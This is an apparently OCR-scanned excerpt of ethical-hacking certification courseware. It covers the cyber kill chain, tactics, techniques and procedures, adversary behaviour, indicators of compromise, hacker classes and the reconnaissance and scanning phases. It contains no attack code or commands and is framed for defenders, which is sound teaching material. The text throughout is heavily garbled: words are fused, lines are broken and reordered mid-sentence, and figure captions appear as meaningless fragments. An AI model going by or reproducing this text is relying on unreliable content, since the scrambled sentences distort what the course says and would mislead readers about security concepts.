example, acquiringweaponsfor mere demonstration ratherthanactualuse),
Eachform of informationwarfarementionedaboveconsistsof both defensiveandoffensive
strategies.
Defensive Information
Warfare: and actions to defendagainst
Involvesall strategies
attackson ICTassets.
Offensive InformationWarfare:Involvesattacksagainst
a
the
ICT
assets
otensiecwartare
of an opponent.

Jy co Nee
——
‘Web
ever
we
@ can or

Emergency
Preparedness
Response
Ma acts

Sytemarg

ofinformation
1.2:BlockDiagram
Figure Warfare

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
ModuleFlow CEH
©Brermen
sooner
©rcxing concent

EthicalHacking InformationSecurity
Concepts awe and Standards

CyberKill Chain Concepts

Thecyber kill chainis an efficient
andeffectiveway of illustrating
howan adversary can attack
the targetorganization. Thismodelhelps organizationsunderstandthe various possible threats
at everystageof an attackandthenecessarycountermeasuresto defend againstsuchattacks.
Also,thismodelprovides professionals
security with a clearinsight
into the attackstrategyused
bythe adversary so that different controlscan be implemented
levelsof security to protectthe
ITinfrastructureof the organization,
the cyber
Thissection discusses kill chain methodology,
common TTPsused byadversaries,
behavioral
identification
ofadversaries,
andIndicators (IoCs}.
of Compromise

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CyberKill Chain Methodology CEH

Kill
Cyber ChainMethodology
The cyberkill chain methodology is a component of intelligence-drivendefensefor the
identification and prevention ofmalicious intrusion activities. Thismethodologyhelps security
professionals in identifying
the stepsthatadversaries followin orderto accomplish their goals.
Thecyber kill chainis a frameworkdeveloped for securingcyberspace basedon the concept of,
military
killchains, Thismethodaims to actively enhanceintrusion detectionandresponse. The
cyberkill chainis equipped with a seven-phase protection mechanism to mitigateand reduce
cyber
threats.
‘Accordingto LockheedMartin,cyberattacks mightoccur in seven different phases, from
reconnaissance to the final accomplishment of the objective.
An understanding of cyberkill
chainmethodology helps professionals
security to leverage controls
security at different
stages
of a n attackand helps them to prevent It also provides
the attackbefore it succeeds. greater
insight into theattackphases, whichhelps theadversary’s
i n understanding
TTPs
beforehand.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Discussed
beloware various phases
includedin cyber
kill chainmethodology:

Reconnaissance
adversary
‘An performs reconnaissanceto collectas muchinformationaboutthe target
as possible to probe for weak pointsbeforeactually attacking.
They lookfor information
suchas publicly availableinformation o n the Internet,
network information, system
information, and the organizational information of the target.By conducting
reconnaissanceacrossdifferent networklevels, can gaininformation
the adversary such
as network blocks, specific IP addresses,and employeedetails.Theadversary may use
automatedtools suchas open portsandservices, vulnerabilities i n applications,
and
logincredentials, to obtain information.Suchinformationcan helpthe adversary in
Bainingbackdoor
access to the targetnetwork.
Activitiesof the adversary includethe following:
© Gathering bysearching
informationaboutthe targetorganization the Internetor
through
social
engineering
Performing ofvarious onlineactivities andpublicly
analysis availableinformation
Gathering
informationfromsocialnetworking sitesandweb services
Obtaining
informationaboutwebsitesvisited
andanalyzing
Monitoring organization's
the target website
Performing
Whois,DNS, andnetworkfootprinting
Performing to identify
scanning openportsandservices
Weaponization
The adversary the data collectedi n the previous stageto identify
analyzes the
vulnerabilities
and techniquesthat can exploit andgain unauthorizedaccess to the
targetorganization. analysis,
Basedon thevulnerabilitiesidentifiedduring the adversary
selectsor creates a payload
tailoreddeliverablemalicious (remote-access
malware
Module ical andCountermensores
Mackin ©by E-Comel
Copyright
weapon) usingan exploit to sendit to the victim. An adversary
and a backdoor may
network devices,operatingsystems,endpoint
target specific devices,or even
individuals
withintheorganizationto carryout theirattack.Forexample,
theadversary
may email
to
an oftheorganization,
senda phishing
a malicious
employee target whichmay include
attachmentsuchas a virus or worm that, whendownloaded,
that allowsremote access to the adversary.
backdooro n the system
installsa

Thefollowing
are the activities of the adversary:

© Identifying payload
malware
appropriate basedo n theanalysis,
a new malwarepayload
©. Creating reusing,modifying
or selecting, theavailable
malwarepayloads
basedon the identifiedvulnerability,
>

©
Creating
phishing
a
email
exploit
campaign
Leveraging kitsandbotnets
Delivery
The previous stageincludedcreating2 weapon. Its payload is transmittedto the
intended victim(s)
as an emailattachment,via a maliciouslink on websites,or througha
vulnerableweb application or USBdrive. Delivery is a keystagethat measures the
effectiveness
of the defensestrategies implemented bythe targetorganization based
whetherthe intrusion attemptof the adversary
‘on is blockedor not.
Thefollowing
are the activities of the adversary:

©.

©.
Sending
phishing
Distributing
emailsto employees
of
the
target
organization
maliciouspayload
USBdrivescontaining to employees
ofthetarget
organization
Performing holeon the compromised
attackssuchas watering website
Implementing
various hacking
servers of the targetorganization the
toolsagainst operating applications,
systems, and

Exploitation
‘After
the weapon is transmittedto the intended victim, exploitation
triggersthe
maliciouscode to exploita vulnerability
adversary’s in the operatingsystem,
application, system.At this stage,
or server on a target the organization
may face
threatssuchas authenticationandauthorizationattacks,
arbitrary
code execution,
physical threats,
security misconfiguration,
andsecurity
Activities of the adversary
includethe following:
© softwareor hardware
Exploiting vulnerabilities
to gain remote accessto the target,
system

ical andCountermensores
Mackin ©by E-Comel
Copyright
Installation
Theadversary downloadsandinstallsmore malicioussoftwareon the targetsystem to
maintain access to the target networkfor a n extendedperiod, Theymay use the
‘weaponto installa backdoorto gainremote access.Afterthe injection of the malicious
code o n one target system, the adversary
gainsthe capabilityto spread the infectionto
other end systems i n the network.Also,the adversarytries to hide the presenceof
maliciousactivities fromsecuritycontrolslikefirewallsusingvarious techniques suchas
encryption.
Thefollowing
are the activities of the adversary:
©
Downloading
andinstallingmalicioussoftwaresuchas backdoors
>

©
Gaining
remote access
Leveraging
various
to
the
methods
targetsystem
backdoor
to keep hiddenandrunning.
Maintaining
accessto the targetsystem
Command
andControl
The adversary creates a commandand control channel,whichestablishes
two-way
communication betweenthe victim'ssystemand adversary-controlled server to
andpassdatabackandforth. Theadversaries
‘communicate implementtechniquessuch
as encryption
performsremote exploitation of
to hidethe presence suchchannels.
on the target
Usingthischannel,
or network.
system
the adversary

Thefollowing
are the activities ofthe adversary:

© Establishing
a two-waycommunication channelbetween
thevictim'ssystem
andthe
adversary-controlled
server
© Leveraging
channelssuchas web traffic,
emailcommunication,
andDNSmessages.
©. Applying
privilege
escalationtechniques
© anyevidenceofcompromise
Hiding usingtechniques
suchas encryption
Actionson Objectives
The adversary controlsthe victim's systemfrom a remote location and finally
accomplishes their intendedgoals.Theadversary gainsaccess to confidentialdata,
disruptsthe services or network,
or destroys
the operational
capabilityof the targetby
gainingaccess to its networkandcompromising more systems.Also,the adversary may
use
this point
to attacks.
as a launching performother

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tactics,
Techniques, and Procedures(TTPs)

T h etermTats, Techriques, andProcedures

(TPsrefersto the patterns
ofactivites
a ndmethods
associated
it specietveat actos of groups wea actors

Tactics » 4
‘Techniques

suggests tn on
Some
Stevo
senthe
dtr oo &
Tactics, andProcedures(TTPs)
Techniques,
Theterms “tactics,techniques, andprocedures―referto the patterns of activities andmethods
associated with specific threatactorsor groupsof threatactors.TTPsare helpful i n analyzing
threats and profiling threat actors and can further be used to strengthen the security
infrastructure ofan organization. is definedas a guideline
Theword “tactics― that describes the
wayan attackerperforms theirattackfrombeginning to end.Theword “techniques― is defined
as the technicalmethodsused byan attackerto achieveintermediateresultsduring their
attack.Finally,theword “procedures― is definedas the organizational approach followedbythe
threat actors to launchtheir attack.In order to understandand defend against the threat
actors,itis important to understandtheTTPs usedbyadversaries. Understanding the tacticsof
an attackerhelps to predict anddetectevolving threatsi n the early stages. Understanding the
techniques used byattackershelpsto identify vulnerabilitiesand implement defensive
measures i n advance.Lastly, analyzing the procedures usedbythe attackershelps to identify
‘what
the attacker
Organizations
for
is looking within the targetorganization's infrastructure.
shouldunderstandTTPsto protecttheir network againstthreat actors and
upcomingattacks.TTPs enablethe organizations thereby
to stopattacksat the initial stage,
thenetworkagainst
protecting massivedamages,
=
Tactics
during
Tacticsdescribethe way the threat actor operates differentphases of an attack.
It consistsof the various tactics usedto gather
information
forthe initialexploitation,
performprivilege
escalationand lateral movement,and deploymeasures for
accessto the system.
persistence Generally,
APTgroupsdepend on a certain set of
unchanging but i n some cases,theyadapt
tactics, to differentcircumstances andalter

ical andCountermensores
Mackin ©by E-Comel
Copyright
thewaytheyperform the difficulty
theirattacks.Therefore, ofdetecting
andattributing
the attackcampaigndepends
on the tacticsusedto perform
theattack.
‘An
organization
can profile
threat actors basedo n tacticstheyuse; this consists of the
way theygatherinformationabout a target,the methodstheyfollow for initial
compromise, andthe numberof entrypointstheyuse while attempting to enter the
targetnetwork.
Forexample,
to obtain information,
some threat actors depend
solely
o n information
availableon the Internet,whereasothersmight perform socialengineeringor use
connections in intermediate organizations. Once information such as the email
addresses of employeesof the target is gathered,
organization the threat actors either
chooseto approach the targeto ne byone or as a group. Furthermore, the attackers’
designed
bechanged
better,
payloadcan stayconstant fromthe beginning
basedon thetargeted
tacticsusedi n the early
individual.Therefore,
stages
of
to the end the attackor may
to understand
of an attackmust beanalyzed
properly.
the threatactors

methodof analyzing
‘Another the APTgroupsis inspecting
theinfrastructure
andtools
usedto perform
theirattack.Forexample,
considerestablishing
acommand
andcontrol
channel
on the servers controlled
bythe attacker.TheseC&Cservers may be located
within a specific geographicallocationor mayspread across the Internetand can be
static or can change dynamically, It is also important to analyze the tools used to
perform the attack.Thisincludesanalyzing the exploits andtoolsusedbyvarious APT
groups.In sucha scenario, a sophisticated threat actor may exploit many zero-day
vulnerabilitiesbyusingadapted toolsandobfuscation methods,However, this might
be
difficult as less-sophisticatedthreat actors generally depend o n publicly known
vulnerabilitiesandopen-source tools.Identifying thistypeof tactic helps i n profiling
the
APTgroups andbuilding defensivemeasures i n advance.
In some cases,understanding
the tactics usedi n the laststages
of an attackhelps
in
the threat actor. Also,the methodsusedto cover the trackshelpthe target
profiling
organization understandattackcampaigns. Analyzing the tactics usedbythe attackers
helpsin creatingan initial profile
byunderstanding differentphases of an APTlife cycle.
Thisprofilehelps i n performing of the techniques
further analysis andprocedures used
bythe attackers.An attackermaycontinually change theTTPsused,so itis importantto
constantlyreview andupdate the tacticsusedbythe APTgroups.
Techniques
To launchan attack successfully, threat actors use severaltechniques duringits
execution. Thesetechniques includeinitial exploitation,settingup and maintaining
command andcontrolchannels, accessing the targetinfrastructure,
andcoveringthe
tracksof dataexfiltration.The techniques followedbythe threat actor to conductan
attackmight vary, but they are mostly similarand can beusedfor profiling. Therefore,
understanding the techniques usedin the different phases of an attackis essentialto
analyzingthethreat groupseffectively.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Techniques can alsobe analyzed at eachstageof thethreatlife cycle, Therefore,the
techniquesat the initial stagemainly describethe toolsusedfor informationgathering
andinitialexploitation, Thetechniques usedi n thisstageneednot necessarily havea
technicalaspect.Forexample, i n socialengineering, certain non-technical
softwaretools
are wayofgathering
usedas an effective information.
Anattackercan use suchtoolsto
obtainthe emailaddresses employees
of targetorganization through publicly
available
resources.
In the samemanner, purely human-based socialengineeringcan beusedto perform the
initial exploitation.
For example, considera scenario wherethe victim is trickedvia a
phone call to reveal their logincredentials for accessingthe targetorganization's
internalnetwork.Thesetechniques are usedi n the initial phase
of an attackto gather
information aboutthetargetandbreakthe firstlineofdefense.
Techniques
usedin the middlestages
of an attackmostly on technical
depend toolsfor
initially
escalatingprivileges
on systems that are compromised or performing lateral
movernents within the targetorganization’s
network.At this stageof an attack,the
attackersuse various exploitsor misuse configurationvulnerabilitieson the target
system. Theymayalsoexploit networkdesign flawsto gainaccessto other systems in
the network.In all of thesecases,either exploits
or a collectionof tools allowsthe
to perform
attacker attack.In thisscenario,the term “technique―
a successful is the set
of tools and the way theyare used to obtain intermediateresultsduring a n attack
campaign.
Thetechniques in the laststageof an attackcan haveboth technical and nontechnical
aspects. In sucha scenario,the techniques usedfor data-stealing are usually basedon
networktechnology and encryption. Forexample, the threatactor encrypts the stolen
files,transfersthemthrough the establishedcommand andcontrolchannel, andcopies
themto their own system. Aftersuccessfullyexecuting theattackand transferring the
files,the attackerfollowscertain purely technicaltechniquesto cover their tracks.They
useautomatedsoftware
After aggregatingthe techniques
files
toolsto clearlogs to evadedetection.
of an attack,the organization
usedin all the stages can
use the informationto profile
thethreat actors.In orderto makean accurateattribution
of threat actors, the organization must observeall the techniques used by its
adversaries.
Procedures
involvea sequenceof actions performed
“Procedures― bythethreatactors to execute
different stepsof an attacklife cycle.Thenumberof actions usually differsdepending
upontheobjectives oftheprocedure andtheAPTgroup.An advanced threat actor uses
advancedprocedures that consistof more actions than a normalprocedure to achieve
the same intermediate result.Thisis done mainly to increase the successrate of an
attackanddecrease the probabilityof detectionbysecurity mechanisms.
For example,
in a basic procedure
of information gathering,
an actor collects
information
aboutthe targetorganization;
identifies
keytargets,employees;
collects

ical andCountermensores
Mackin ©by E-Comel
Copyright
theircontact details,
identifiesvulnerablesystems and potentialentrypointsto the
targetnetwork,anddocumentsall the collectedinformation.Thefurther actions of an
adversarydepend on the tactics used.Theseactions includeextensive researchand
repeated
informationgathering
to collectin-depth
and up-to-date
informationon the
via socialnetworking
targetindividuals sites.Thisinformation can assistthreatactors in
performing spear phishing,monitoring
security controlsto identify zero-dayexploitsin
the targetsystems, andothertasks.Forexample, a threatactor usinga more detailed
procedure executesthe malwarepayload. At the time of execution, the maliciouscode
decrypts evades
itself, security
monitoringcontrols, deployspersistence, andestablishes
a command andcontrolchannelfor communicating with the victim system.Thistypeof
procedure
is common for malware,
wheredifferentthreat actors may implement
the
same feature,
andhenceitis usefuli n forensicinvestigations.
‘Anunderstandingand proper analysis of the proceduresfollowed bycertain threat
actors duringan attack helps organizations profile
threatactors.In theinitialstageof an
attack, suchas duringinformationgathering, observing
the procedure of an APTgroupis
difficult. However,the later stagesof an attackcan leavetrailsthat may be usedto
understandthe procedures the attackerfollowed.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BehavioralIdentification
Adversary
(@Adversary
behavioral
dentifationinvolves

(©.
eevesthesecurtyprofessionals
sgh
into
upcoming
threats andexploits

ec
Powerslrrr
BH vest
BD ster erage

reed
ron||FR) and
cnt
server
Actoties
ont
staging
command

BehavioralIdentification
Adversary
‘Adversary
behavioralidentificationinvolvesthe identificationof the common methodsor
techniquesfollowedbyan adversary to launch attacks
to penetrate an organization’s
network.
professionals
It givessecurity insight
into upcomingthreatsand exploits. It helpsthem plan
networksecurityinfrastructure andadapt a rangeof securityprocedures as preventionagainst
various cyberattacks.
Givenbelow are some of the behaviorsof an adversary that can be used to enhancethe
detection
capabilities
=
security
devices: of
InternalReconnaissance
Oncethe adversary is insidethe targetnetwork, theyfollow various techniques and
methodsto carry out internalreconnaissance. Thisincludesthe enumeration of
systems, hosts, processes, the execution of various commands to find out information
suchas the localuser context and system configuration, hostname, IP addresses,
active
remote systems, and programsrunningon the targetsystems. Securityprofessionals
monitor the activities of an adversary
‘can bychecking for unusualcommands executed
in the BatchscriptsandPowerShell andbyusingpacket capturingtools
Useof PowerShell
PowerShell can be usedbyan adversary as a tool for automatingdataexfiltrationand
launching To identify
furtherattacks. the misuseof PowerShell in the network, security
professionals can checkPowerShell’s
transcriptlogsor WindowsEventlogs.The user
agentstringandIP addresses can alsobeusedto identify malicioushostswhotry to
exfiltratedata,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Unspecified
ProxyActivities
adversary
‘An can create and configure multiple domainspointingto the same host,
thus,allowingan adversary to switchquickly betweenthe domainsto avoiddetection,
Securityprofessionals
can find unspecifieddomainsbychecking thedatafeedsthat are
generated bythosedomains.Using this data feed,the securityprofessionals
can also
filesdownloadedandthe unsolicitedcommunicationwith theoutside
find anymalicious
networkbasedon the domains.
UseofCommand-Line
Interface
(Ongainingaccessto the targetsystem, can makeuse of the command-line
an adversary
interfaceto interact with the targetsystem, browsethe files,readfile content,modify
file content,create new accounts,connect to the remote system, anddownloadand
installmaliciouscode.Security professionals
can identify
this behaviorof an adversary
bychecking thelogsforprocessID,processes having
arbitrary lettersandnumbers,and
files
malicious downloaded
HTTPUserAgent
fromthe Internet,

In HTTP-based theserver identifiestheconnected

communication, HTTPclientusingthe
user agentfield. An adversary
modifiesthe content of the HTTPuser agentfield to
communicate with the compromised systemand to carry further attacks.Therefore,
professionals
security can identify
thisattackat an initial stagebycheckingthe content
of the
Command
userfield,
agent
andControlServer
Adversariesuse commandand control servers to communicate remotely with
compromised systemsthrough an encryptedsession. Using this encryptedchannel,
the
adversarycan stealdata,deletedata,and launch furtherattacks. professionals
Security
can detectcompromised hostsor networksbyidentifying the presence of a command
and control server bytracking
network trafficfor outbound connection attempts,
unwantedopen ports,andotheranomalies.
Use of DNSTunneling
Adversariesu se DNS tunneling to obfuscate traffici n the legitimate
malicious traffic
carriedbycommon protocols usedin the network.UsingDNStunneling, an adversary
can also communicate with the command andcontrolserver, bypass securitycontrols,
and perform data exflltration. Security
professionals
can identify DNStunneling by
analyzing malicious DNS requests,DNS payload, unspecified domains, and the
of requests.
destination DNS
Useof WebShell
adversary
‘An uses a webshellto manipulatethe web server bycreating
a shellwithin a
website;
it allowsan adversary to gainremote accessto the functionalities
of a server.
Usinga web shell,an adversary
performs
various taskssuchas data exfitration, file
andfile uploads.
transfers, professionals
Security can identify
thewebshellrunningi n

ical andCountermensores
Mackin ©by E-Comel
Copyright
the network byanalyzing
server access,error logs, stringsthat indicate
suspicious
encoding, andthrough
strings,
user agent othermethods.
Data Staging
Aftersuccessful
penetration
into a target's
network, the adversary
uses datastaging
techniques
tocollectasdata
andcombine much
by an adversary
as possible.
includesensitive dataaboutthe employees
businesstactics of an organization,
of
Thetypes datacollected
and customers,the
financialinformation,
and networkinfrastructure
information. Oncecollected, the adversarycan either exfitrateor destroythe data
Securityprofessionals can detect data stagingby monitoring network traffic for
maliciousfile transfers,
file integrity
monitoring,andevent logs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Indicatorsof Compromise
(IoCs)
{©
ndeatrs
Cs)
are
he
cues,of dat
ofCompromise artfats,
and pecs foresi ound on he network

(©locsarenotintetigence,
they
although
do
act as good source ofinformation thethreats
regarding that

(©:
secuntyprofesionalnes to performcontinuous of oC
monitoring to ffcively andefcent detect,
ondrespond
to evelingever treats

(IoCs)
Indicatorsof Compromise
Cyberthreats are continuously
evolving
with the newer TTPsadapted
based on the
vulnerabilities
of the targetorganization. professionals
Security must perform continuous
of loCsto effectively
monitoring and efficiently
detectand respond to evolving
cyber threats.
Indicators
of Compromise are the clues, andpiecesof forensic
artifacts, datathat are found on
a network or operating systemof an organization that indicate 2 potentialintrusion or
‘malicious i n the organization's
activity infrastructure.
However,loCsare not intelligence;rather,loCsact as a goodsource of information about
threatsthat serve as data pointsi n the intelligence process. Actionablethreat intelligence
extractedfromloCshelps organizations enhance incident-handling Cybersecurity
strategies.
professionals use various automatedtools to monitor loCsto detect and preventvarious
securitybreaches to the organization.Monitoring !0Cs alsohelpssecurity teams enhance the
securitycontrolsandpolicies of the organizationto detectandblocksuspicious trafficto thwart
furtherattacks.To overcome the threatsassociated with loCs,
some organizations like STIX and
TAXI havedeveloped standardized reportsthat contain condensed datarelatedto attacksand
sharedit with othersto leverage the incidentresponse.
IoCis an atomic indicator,
‘An computed indicator,or behavioralindicator.It is theinformation
regarding suspiciousor malicious activities that is collected from various security
establishments in a network's infrastructure.
Atomic indicators are thosethat cannot be
segmented
Examples
into
smaller parts,andwhosemeaningis not changed
of atomic indicatorsare IP addresses
obtainedfromthedataextractedfroma security
andemailaddresses.
incident.Examples
in thecontext
Computed
ofcomputed
ofan
intrusion,
indicatorsare
indicatorsa re
hashvaluesand regular expressions. Behavioralindicatorsrefer to a groupingof both atomic
andcomputed indicators,
combinedon the basisof some logic.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
of Indicatorsof Compromise
Categories CEH
|@ Understanding securityprofesional
los helps detectthetveatsagains
to quichy andprotect
the organization

Forthispurpose,loCsa re dividedinto fourcategories:

of Indicatorsof Compromise
Categories
The cybersecurity professionals
must have proper knowledge about various possiblethreat
to cyber
actors andtheirtacticsrelated threats,mostly
calledIndicatorsof Compromise (IoCs)
Thisunderstanding of loCshelps
securityprofessionals
quicklydetectthe threatsentering the
organization fromevolving
andprotect the organization threats.For this purpose,loCs are
dividedinto four categories:
=
EmailIndicators
Attackersusuallypreferemailservices to sendmaliciousdatato the targetorganization
or individual.Suchsocially
comparative
address,
anonymity.
emailsubject,
andattachments
emails
engineered are preferred
Examples
dueto their ease useand
of email indicatorsinclude the sender'semail
or links.
of
NetworkIndicators
Network indicatorsare useful for commandand control, malwaredelivery,
and
identifying
detailsabout the operatingsystem,browsertype,andothercomputer-
specific
information.Examplesof networkindicatorsincludeURLs,
domainnames, and
IP addresses.
Host-Based
Indicators
indicatorsa re found byperforming
Host-based an analysis
of the infectedsystem
within
the organizational
network.Examples of host-based
indicatorsincludefilenames,
file
hashes, keys,
registry DLLs, andmutex.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Behavioral
Indicators
Generally, typicalloCs are useful for identifyingindicationsof intrusion, such as
maliciousIP addresses, MDS hash,
virus signatures, anddomainnames. BehavioralloCs
are used to identify specific behaviorrelated to maliciousactivities suchas code
injectioninto the memoryor running the scriptsof an application. Well-defined
behaviorsenablebroadprotection to blockall current andfuture maliciousactivities.
Theseindicatorsare usefulto identify when legitimate systemservices are usedfor
abnormalor unexpected activities. Examplesofbehavioral indicatorsincludedocument
PowerShell
executing script,andremote command execution.
Liste1dbeloware some of the keyIndicators of Compromise
(loCs):
Unusual
outbound networktraffic
Unusualactivitythrough
a privileged
user account

Geographical
anomalies
Multiple
Increased
login failures
databasereadvolume
Large
HTMLresponse size

Multiple for the samefile

requests
Mismatchedport-application
traffic
Suspicious
registrysystem
or file changes
Unusual
DNSrequests
Unexpected
patching
of systems
Signs (DDoS)
of DistributedDenial-of-Service activity

of
Bundlesdata the wrong places
i n

Webtrafficwith superhuman
behavior

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow
CEH
‘Information
Security
peer ©scring
concepts chain

Information
Security

mKQ
Hacking
Concepts
of hacking:
Thissection dealswith basicconcepts whatis hacking,
whois a hacker, andhacker
classes—thefive distincthacking
phasesthat one shouldbe familiarwith before proceeding
with ethicalhacking methodology.

08
Module 27
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 What is Hacking?

(@Hacking
refers
exploiting
system
vulnerabilities
to
and
compromising
security
sytem
to ain unauthorized controls
resources,
or nappropiteaccess toa

purpose a
(©
teinvoles modifying ot application to achieve
features goaloutsideofthe
original
system
eata's

(@Hackingcanbe
used to steal andrestibute tobusiness
intelectualpropertyleading
los

Whatis Hacking?
Hacking in the field of computer securityrefers to exploiting systemvulnerabilitiesand
compromisingsecuritycontrolsto gain unauthorized or inappropriate access to system
resources. It involvesa modifying systemor application featuresto achievea goaloutsideits
creator's original purpose.Hacking can be doneto steal, pilfer,or redistribute intellectual
property, thusleading to businessloss.
Hacking o n computer networksis generally done using scriptsor othernetworkprogramming,
Networkhacking techniques includecreating viruses and worms, performing denial-of-service
(DoS)attacks, establishing
unauthorizedremote access connectionsto a deviceusing trojansor
backdoors, creatingbotnets, packet sniffing, phishing,and password cracking. Themotive
behindhacking couldbe to stealcriticalinformationor services,for thrill,intellectualchallenge,
curiosity, knowledge,
experiment, financialgain, prestige,
power, peerrecognition,
vengeance
andvindictiveness,
amongotherreasons

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Who is a Hacker?

ol 02 03

‘excellent
skills tosor
computer
Can
create ee who ‘hobbyhow mary
gain
‘either

(orto
probe
do
beto

legal
knowledge

computer
software
‘ean
andexpore computers networks
they and
snd compromise ‘hinge

mo rs

Somehackwth
malicious
intent dat,
card security
such
numbers,
a t tealbusines cet information,
social

Who
is a Hacker?
A hackeris a personwho breaksinto a systemor networkwithoutauthorizationto destroy,
steal sensitive data,or perform maliciousattacks.A hackeris an intelligent
individualwith
excellentcomputer skills,along with the ability the computer's
to create andexplore software
andhardware.Usually, a hackeris a skilledengineeror programmer with enoughknowledge to
discovervulnerabilitiesin a targetsystem. They generallyhave subject and enjoy
expertise
learningthe detailsof various programming
For some hackers, hacking is a hobby
languages and
to see how manycomputers
computer
systems.
or networkstheycan
compromise. Theirintention can either be to gain knowledge
or to poke aroundto do illegal
things.Some hackwith maliciousintent behindtheir escapades, businessdata,
like stealing
creditcardinformation,
socialsecurity numbers, andemailpasswords,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
HackerClasses CEH
@
ac Hate @Q
WaiteHats
@
CrayHat
@
Suicide
Hackers

oo @Q@@o

HackerClasses
Hackersusually
fall into one of the following according
categories, to their activities:
Black Hats:Blackhatsare individualswho use their extraordinary skillsfor
computing
illegal
or malicious
purposes.Thiscategory
of hackeri s ofteninvolvedi n criminal
are
activities. They alsoknownas crackers.
White Hats: Whitehatsor penetration testers are individualswho use their hacking
skillsfor defensivepurposes.Thesedays,almosteveryorganization hassecurity analysts
who are knowledgeable about hacking
countermeasures, whichcan secure its network
and information systems againstmaliciousattacks.Theyhave permissionfromthe
systemowner
GrayHats: Grayhatsare the individualswhoworkboth offensively and defensivelyat
various times. Gray hatsmight
to vulnerabilities
helphackersfind various
or
network and,at the same time, helpvendorsto improve products
hardware) bycheckinglimitationsandmaking then more secure,
in a system
(software
or

SuicideHackers:Suicidehackersare individualswho aim to bringdown critical

infrastructure andare not worriedaboutfacing
for a “cause― jailterms or anyotherkind
of punishment.
are who
Suicidehackers similarto suicidebombers sacrificetheirlife for
a n attackandare thusnot concernedwiththe consequencesof their actions.
Kiddies:
Script Scriptkiddies
a re unskilled
hackers whocompromisesystemsbyrunning
scripts,tools,and softwaredeveloped by real hackers.Theyusually
focuson the
quantity
rather
quality
thanthe oftheattacksthat they
initiate.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Cyber terrorists are individuals
Terrorists:Cyber with a wide rangeof sills,motivated
byreligious
or political
beliefs,
to create fear of large-scale
disruption
of computer
networks.
State-Sponsored
Hackers:State-sponsored
hackersare individualsemployed
bythe
gain top-secretinformation from, and damage
governmentto penetrate, the
informationsystems
of othergovernments.
Hacktivist:Hacktivismis whenhackersbreak into government or corporate computer
systems a s an act of protest.Hacktivists use hacking to increase awareness of their
socialor politicalagendas, as well as to boosttheir own reputations i n both the online
andoffline arenas. They
especiallybydefacing
are individuals
or disabling
who use hacking
websites a
to promotepolitical agenda,
Commonhacktivisttargetsincludegovernment agencies, multinationalcorporations,
andany otherentitythat theyperceiveas a threat.Irrespective of the hacktivists’
the gaining of unauthorized
intentions, access is a crime,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Phase:Reconnaissance
Hacking

knownona
‘The broad
sale,

ange
may
include
the employees,
econnaeance target
operations,
and target orguiatin’schns, newark systems

Types
PassiveReconnaissance
Reconnaissance

‘Retive
Receemaiseance

avec
oration without
heiwohes
with
target
Pasiverecoonlseanceinvolves
acauing
interacting
©Activereconnaissance
interacting
ety
byanymeans

publ
© Forexample,
searching
hala
or recordsor des etn department

HackingPhases
In general,
thereare five phases
of hacking:
Reconnaissance
Scanning

=
Access
Gaining

Maintaining Access
=

Clearing
Hacking
Tracks
Phase:Reconnaissance
Reconnaissance refers to the preparatory phasein which an attacker gathers as much
informationas possible about the targetprior to launching the attack. In this phase, the
attackerdrawson competitive intelligenceto learnmore aboutthe target.It could bethe
future pointof return,notedfor ease of entryfor an attackwhen more aboutthe targetis
knownon a broadscale.Thereconnaissance
clients,
employees, operations,network, andsystems. target
range
mayinclude the targetorganization's

phase
‘This allowsattackersto plan the attack.It may take some time as the attacker gathers as.
muchinformation a s possible.
Partof this reconnaissance may involvesocialengineering.A
socialengineeris a personwho convinces people to revealinformationsuchas unlistedphone
numbers, passwords, and othersensitive information. For instance,the hackercouldcallthe
target'sInternet service provider and,usingpersonal informationpreviously obtained,convince
the customer service representative that the hacker is actuallythe target,and in doingso,
obtaineven more informationaboutthe target.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Another reconnaissance technique is dumpster diving.Dumpster divingis, simplyenough,
lookingthrough trashfor any discardedsensitive information.Attackerscan
an organization’s
Use the Internet to obtain information suchas employees’contact information, business
partners,technologiescurrentlyi n use, andothercriticalbusinessknowledge. Dumpster diving
may even provide attackerswith even more sensitive information, suchas usernames,
passwords, creditcardstatements, bank statements, ATM receipts, SocialSecuritynumbers,
privatetelephone checking
numbers, account numbers, or othersensitive data,

Searching targetcompany’s
for the web site in the Whois
Internet’s database can easily
provide
hackerswiththe company's
IP addresses,
domainnames,andcontact information.
Reconnaissance
Types
techniques
Reconnaissance are broadly
categorized
into active andpassive.
Whenan attackeris usingpassivereconnaissancetechniques, theydo not interact with the
targetdirectly.
Instead,the attackerrelieson publicly
availableinformation,
news releases, or
otherno-contact methods.
Activereconnaissancetechniques, on theother hand,
involvedirectinteractions with the target
system byusing tools to detect open ports, accessible hosts,router locations, network
mapping,detailsof operating systems, and applications.
Attackersuse active reconnaissance

telephone of
whenthere is a low probabilitythe detectionof theseactivities, For example,
callsto the helpdeskor technicaldepartment,
theymay make
Asanethicalhacker, to beableto distinguish
itis important among the various reconnaissance
methodsandadvocate m easures i n the lightof potential
preventive threats.Companies, on
as an integral
their part,must addresssecurity partof their businessandoperational strategies,
andbeequipped withthe properpolicies
andprocedures to checkfor potential vulnerabilities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Phase:Scanning
Hacking

Pro-attack
Phase
referst o thepre-attack
Scanning
‘networ
forspecific
phase the
information
based when
on informationattacker
scans
theres
the
ring

can ince
‘Scanning theuse ofelrs, portscanners, network mapper
in tools,and vera sanners

Extract
Information || extract
information
Attackers

typ, to atack
OSdeta, devce and
uch
system
as lve machines,
uptimelaunch
port, ort status

HackingPhase:Scanning
Scanning is the phase immediately preceding the attack.Here,the attackeruses the details
gathered
during
reconnaissance to scan the networkfor specific information.Scanning is a

